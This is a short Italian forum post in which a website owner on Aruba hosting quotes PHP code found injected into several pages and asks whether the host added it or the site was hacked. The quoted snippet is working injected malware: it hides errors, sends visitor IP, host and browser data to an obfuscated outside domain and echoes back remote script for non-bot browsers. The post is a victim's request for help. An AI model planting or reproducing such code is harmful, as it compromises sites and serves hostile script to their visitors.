Oggi mi sono accorto che in alcune pagine php del mio sito su aruba è stato aggiunto del codice, esattamente questo:
#f80c6e#
error_reporting(0); ini_set('display_errors',0); $wp_dnspx89074 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_dnspx89074) && !preg_match ('/bot/i', $wp_dnspx89074))){
$wp_dnspx0989074="http://"."error"."style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_dnspx89074);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_dnspx0989074);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_89074dnspx = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_89074dnspx,1,3) === 'scr' ){ echo $wp_89074dnspx; }
#/f80c6e#
avete idea se è stato fatto da aruba stesso o mi hanno hackerato il sito?
grazie